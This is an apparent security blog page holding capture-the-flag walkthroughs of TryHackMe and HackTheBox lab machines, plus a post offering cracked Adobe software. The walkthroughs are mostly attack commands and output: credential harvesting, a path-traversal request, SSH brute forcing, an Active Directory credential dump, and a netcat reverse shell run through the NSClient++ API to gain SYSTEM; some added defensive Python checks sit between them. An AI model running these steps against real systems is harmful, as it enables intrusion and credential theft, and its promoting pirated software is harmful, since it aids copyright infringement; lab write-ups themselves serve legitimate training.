Information Technology | Softwares - Graphics - Programming - Hacking - Security


Jul 19, 2020

Download Full Adobe Creative Cloud Suite 2020 Full New Update | Free Download

[Images: application icon, file icon, folder icon, some splash screens]
Download Adobe After Effects 2020
Download Adobe Animate 2020
Download Adobe Character Animator 2020
Download Adobe Dimension 2020
Download Adobe Illustrator 2020
Download Adobe InDesign 2020
Download Adobe Photoshop Lightroom Classic 2020
Download Adobe Media Encoder 2020
Download Adobe Photoshop 2020
Download Adobe Premiere Pro 2020
Download Adobe XD 2020

Just Install then Enjoy!

Jun 29, 2020

TryHackMe - Linux PrivEsc Arena


Room link: https://tryhackme.com/room/linuxprivescarena
This room is a very basic introduction to privilege escalation on Linux. Almost every task shows a way to get a root shell, with a very detailed tutorial. I noted down some of the tasks while completing the room; maybe it is helpful.

Task 2
Login as TCM with SSH: ssh TCM@<machine ip>
password: Hacker123

Task 4

Read the credentials file: cat /etc/openvpn/auth.txt
We will see password321 as the password and user as the username

Task 5
#1: TCM trying to log into mysql
#2: TCM trying to log in as root
#3: Password: password123

Task 6
Run "ls -al /etc/"; the permissions of the shadow file are -rw-rw-r--

Task 7
Run "find / -name id_rsa 2> /dev/null" and we get the path of the id_rsa file: /backups/supersecretkeys/id_rsa
Read it and save it locally under the name id_rsa, run "chmod 400 id_rsa" to set the permissions, and we can log in as root over SSH without a password: ssh -i id_rsa root@<machine ip>

Task 12
Run "dpkg -l | grep nginx"
We see that the nginx version is 1.6.2-5. This version has a vulnerability that allows local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
#1 Answer: CVE-2016-1247
We can see the PoC in the /home/user/tools/nginx/nginxed-root.sh file, or the exploit code at this link:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

#2: It shows SUIDBIN="/usr/bin/sudo", so sudo is SUID-enabled and assists in the attack
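An added example of mine, not code from the room or from the linked advisory: a small audit that reports the two conditions this class of log-handling bug depends on, a log file that is a symlink and a log directory the web server account can write to (so it could replace a log with a link before a privileged logrotate job touches it). The directory it checks is constructed in a temporary location; `audit_log_dir` and `demo` are names I chose.

```python
import os
import stat
import tempfile

# Added example (not from the room or the advisory): report the conditions a
# symlink-on-log-file privilege escalation depends on.


def _writable_by(st, uid, gid):
    """True if an account with this uid/gid may write to the inode described by st."""
    if st.st_mode & stat.S_IWOTH:
        return True
    if st.st_gid == gid and st.st_mode & stat.S_IWGRP:
        return True
    return st.st_uid == uid and bool(st.st_mode & stat.S_IWUSR)


def audit_log_dir(log_dir, service_uid, service_gid):
    """Return a list of (path, finding) tuples; an empty list means nothing was found.

    service_uid/service_gid are the ids the web server runs as (e.g. www-data).
    """
    findings = []
    # If the service account can write to the directory it can unlink a log
    # and replace it with a symlink, whatever the log file's own permissions are.
    if _writable_by(os.lstat(log_dir), service_uid, service_gid):
        findings.append((log_dir, "directory writable by service account"))
    for name in sorted(os.listdir(log_dir)):
        path = os.path.join(log_dir, name)
        st = os.lstat(path)  # lstat: look at the link itself, never follow it
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "log file is a symlink -> " + os.readlink(path)))
    return findings


def demo():
    """Build a constructed log directory and audit it for two different service accounts."""
    log_dir = tempfile.mkdtemp(prefix="log-audit-")  # created mode 0700, owned by us
    with open(os.path.join(log_dir, "access.log"), "w") as fh:
        fh.write("constructed sample line\n")
    # A dangling symlink standing in for a replaced error log (target is constructed).
    os.symlink("/root/constructed-target", os.path.join(log_dir, "error.log"))

    me_uid, me_gid = os.getuid(), os.getgid()
    # Case 1: the service account owns the directory (the risky layout).
    as_owner = audit_log_dir(log_dir, me_uid, me_gid)
    # Case 2: same directory, root-owned 0755 from the service account's point of view.
    os.chmod(log_dir, 0o755)
    as_other = audit_log_dir(log_dir, me_uid + 1000, me_gid + 1000)
    return as_owner, as_other


if __name__ == "__main__":
    for label, result in zip(("service owns dir", "service is other"), demo()):
        print(label, "->", result or "clean")
```

Run it against /var/log/nginx (or any daemon's log directory) with the daemon's uid and gid; the fix on the server side is a root-owned, non-writable log directory plus a logrotate configuration that does not chown files in a directory the service can modify.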


Wonderful knowledge for beginners, thanks to TCM

May 1, 2020

HackTheBox Machine Write-up | Magic Walkthrough

For the write-up of an active machine, you need the root flag as the password to read it.
Starting from the Traceback machine, the flag is dynamic, so the write-up will be published when the machine is retired.



Apr 20, 2020

HackTheBox Machine Write-up | Monteverde Walkthrough

┌─[laladee@parrot]─[~/Downloads]
└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -47m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-20T03:57:38
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds

After enumeration, we have a couple of usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan

I tried some ways to log in, and I was able to access SMB as SABatchJobs with the password set to the username


┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password: 

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
azure_uploads   Disk      
C$              Disk      Default share
E$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
users$          Disk      
SMB1 disabled -- no workgroup available

We can see this user has access to the "users$" share

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
  .                                   D        0  Fri Jan  3 13:12:30 2020
  ..                                  D        0  Fri Jan  3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
  mhope                               D        0  Fri Jan  3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file.  See it anyway? 
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+  Stopped                 smbclient //10.10.10.172/users$ -U SABatchJobs


azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
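An added example of mine, not part of the write-up: Export-Clixml output like azure.xml above is a regular XML document in the PowerShell serialization namespace, so a defender can scan file shares for exports whose string properties carry credentials and flag them before someone else finds them. The sample document below is constructed with a placeholder password; `find_clixml_secrets` is my name.

```python
import xml.etree.ElementTree as ET

# Added example (not from the write-up): find credential-bearing string
# properties in PowerShell CLIXML exports.

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
SENSITIVE_WORDS = ("password", "secret", "token", "apikey", "credential")

# Constructed sample in the same shape as azure.xml; the password is a placeholder.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-NOT-A-REAL-SECRET</S>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TN RefId="1"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN>
    <Props>
      <S N="Name">batch-upload</S>
      <S N="Comment">nothing sensitive here</S>
    </Props>
  </Obj>
</Objs>"""


def _tag(local):
    """Qualify an element name with the PowerShell CLIXML namespace."""
    return "{%s}%s" % (PS_NS, local)


def find_clixml_secrets(xml_text):
    """Return one dict per string property whose name looks like a credential."""
    root = ET.fromstring(xml_text)
    hits = []
    for obj in root.iter(_tag("Obj")):
        type_names = [t.text for t in obj.findall("./%s/%s" % (_tag("TN"), _tag("T")))]
        props = obj.find(_tag("Props"))
        if props is None:
            continue
        for prop in props.findall(_tag("S")):  # <S> = serialized string property
            name = prop.get("N", "")
            if prop.text and any(w in name.lower() for w in SENSITIVE_WORDS):
                hits.append({
                    "object": type_names[0] if type_names else "(unknown)",
                    "property": name,
                    "value_length": len(prop.text),  # report length, never the value
                })
    return hits


if __name__ == "__main__":
    for hit in find_clixml_secrets(SAMPLE_CLIXML):
        print(hit)
```

Pointing this at every *.xml under a users$ share would have caught the file above; the report deliberately carries the property name and value length, not the value itself, so the scan output can be shared without becoming a second copy of the secret.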

Ok, now we have the password of user "mhope"

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents> 


GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\> 

After a few minutes of Googling MEGABANK\Azure Admins
I found this vulnerability: https://blog.xpnsec.com/azuread-connect-for-redteam/


┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/19/2020   9:46 PM           1454 AzureAD-Connect.ps1
-a----        4/19/2020  10:42 PM           2264 Azure_meo.ps1
-a----        4/19/2020   9:40 PM           1453 Connect.ps1
-ar---         1/3/2020   5:48 AM             32 user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit

┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents> 


Apr 19, 2020

HackTheBox Machine Write-up | ServMon Walkthrough


[ Laladee ~/Downloads ]# nmap -A 10.10.10.184 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 10:08 UTC
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/15%Time=5E96DD61%P=x86_64-unknown-linux-gnu%r
SF:(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r
SF:\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x20
SF:1\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml
SF:1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999
SF:/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\
SF:x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x2
SF:0\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPO
SF:ptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPReques
SF:t,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourReque
SF:st,65,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/15%OT=21%CT=1%CU=33911%PV=Y%DS=2%DC=T%G=Y%TM=5E96DDD
OS:8%P=x86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DN
OS:W8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=8
OS:0%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T10:13:57
|_  start_date: N/A

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   266.12 ms 10.10.14.1
2   476.44 ms 10.10.10.184

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.64 seconds

Log in to FTP as the Anonymous user and download the Confidential.txt file

ftp> cd Users
ftp> cd Nadine
ftp> get Confidential.txt

After visiting 10.10.10.184 it showed a login page, so I searched for an NVMS-1000 exploit:
Link: https://www.exploit-db.com/exploits/47774

GET  /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

We should remember the contents of Confidential.txt:
 "I left your Passwords.txt file on your Desktop"

GET  /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
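The two requests above work because the server joins the request path onto its document root without checking where the result lands. As an added example of mine (not NVMS-1000 code and not the exploit-db entry), here is the check a file-serving handler needs: decode, normalise, and then require the result to stay under the root. The root and the request paths are constructed; `resolve_under_root` and `triage` are my names.

```python
import posixpath
from urllib.parse import unquote

# Added example (not vendor code): canonicalise a request path under a
# document root and refuse anything that escapes it.

DOC_ROOT = "/srv/nvms/www"  # constructed


def _fully_decode(path, max_rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) before inspecting the path."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    return path


def resolve_under_root(root, request_path):
    """Return the canonical path for request_path under root, or None if it
    escapes the root (traversal), contains a NUL, or is otherwise malformed."""
    decoded = _fully_decode(request_path)
    if "\x00" in decoded:
        return None
    # Windows servers accept backslashes as separators; treat them the same way.
    decoded = decoded.replace("\\", "/")
    # Always resolve relative to the root: a leading slash must not mean "/".
    relative = decoded.lstrip("/")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


# Constructed requests: the first two follow the write-up's traversal pattern.
SAMPLE_REQUESTS = [
    "/../../../../../../windows/win.ini",
    "/..%5c..%5c..%5cUsers/Nathan/Desktop/Passwords.txt",
    "/%252e%252e/%252e%252e/windows/win.ini",
    "/Pages/login.htm",
    "/img/../Pages/login.htm",
]


def triage(root, requests):
    """Map each request to its resolved path, or 'BLOCKED' when it is refused."""
    return {r: (resolve_under_root(root, r) or "BLOCKED") for r in requests}


if __name__ == "__main__":
    for req, outcome in triage(DOC_ROOT, SAMPLE_REQUESTS).items():
        print(f"{outcome:45} {req}")
```

The string check is the cheap first gate; a handler that also follows symlinks should additionally resolve the candidate with os.path.realpath and repeat the prefix test on the result.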

You will find the passwords:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Save these passwords in a "pass.txt" file and make one more file, "users.txt", with the usernames nathan and nadine.

Now use Hydra to find SSH login credentials with the following command:
laladee@parrot:~# hydra -L users.txt -P pass.txt 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184  login: nadine  password: L1k3B1gBut7s@W0rk

Log in over SSH:
laladee@parrot:~# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]         
© 2019 Microsoft Corporation. All rights reserved.
                                                 
nadine@SERVMON C:\Users\Nadine>
Now go to the Desktop and read the flag:
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
GOT FLAG

Time to find the NSClient++ password:
C:\"program files"\nsclient++\nsclient.ini
found password: ew2x6SsGTxjRwXOT

According to this config, the web page has to be called via 127.0.0.1.
Now check which port the NSClient++ service is running on:
nadine@SERVMON C:\Program Files\NSClient++>netstat -a
You will find that it is running on port 8443.
As we have already seen in the Nmap results, it serves a web page over SSL on localhost.

Create "meo.bat" file:
@echo off
C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe

Start SimpleHTTPServer:
laladee@parrot:~# python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...

Download nc.exe and meo.bat file:
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/nc.exe" -outfile "c:\Temp\nc.exe"
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/meo.bat" -outfile "c:\Temp\meo.bat"

Go to your terminal and start the listener:
laladee@parrot:~# nc -lvnp 4444
listening on [any] 4444 ...

After reading the NSClient++ API docs and getting some hints, we can add and execute our bat file with the following commands:

nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\Temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/meo.bat --data-binary "C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe"
nadine@SERVMON C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/
Type the admin password that we found:
ew2x6SsGTxjRwXOT

Now check your listener:
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt


Apr 16, 2020

Crack Password Cheat Sheet | How to crack and brute force passwords


